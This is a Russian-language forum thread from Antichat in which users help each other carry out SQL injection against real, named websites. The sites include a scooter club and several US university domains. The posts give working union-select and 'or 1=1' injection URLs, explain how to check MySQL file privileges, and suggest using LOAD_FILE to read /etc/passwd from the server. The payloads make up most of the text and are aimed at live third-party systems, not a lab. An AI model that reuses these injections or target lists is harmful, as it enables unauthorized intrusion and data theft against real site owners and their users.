ANTICHAT — форум по информационной безопасности, OSINT и технологиям

http://scooter-club.ru/index.php?content=yes&page_id=-1+union+select+1,database()+/*

__________________
Появляюсь редко. Важные дела в реале.

А есть ли возможность посмотреть присутствует ли file_priv у данного пользователя?

если доступа к mysql.user нет - то скорей всего file_priv нет. А если есть доступ то запрашиваешь колонку file_priv из таблицы mysql.user - если Y -то есть, если N - то нет

u36a, возможность есть. в твоем случает file_priv не присутствует
https://forum.antichat.ru/showpost.php?p=942609&postcount=34
вот тут все описано, не буду цитировать.

u36a, сделай в поле вывода LOAD_FILE('/etc/passwd') если сервак юниксовый... при наличии файлприва получишь содержимое, при отсутствии - или пустоту или ошибки... Ну в общем вывода не будет...

спасибо , счас почитаю)))))

Помимо там описанного не забываем так же о табличке user_privileges из information_schema.

SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘file’ AND grantee like ‘%username%'

u36a, но в твоем случае это не прокатит т.к. версия 4.1. Заюзай вариант с LOAD_FILE, как уже было предложено

что то у меня не получается)
http://studorgs.bowdoin.edu/meddies/members.php?mid=-27+or+1=1/*
http://cyberbuzz.gatech.edu/ice_hockey/news.php?nid=-4+or+1=1/*&PHPSESSID=8021c6f2f9284e9566bd87b298ef8f30
http://ext.wsu.edu/pnn/user/viewNotification.php?nid=-2007-326+or+1=1--
http://studorgs.bowdoin.edu/meddies/news.php?nid=-10+or+1=1/*
http://www.umass.edu/research/rld/bioportal/viewfac.php?fid=-79+or+1=1/*

http://www.mgv.edu/view_news.php?nid=-1+union+select+1,version(),3,4--
а в чем проблема?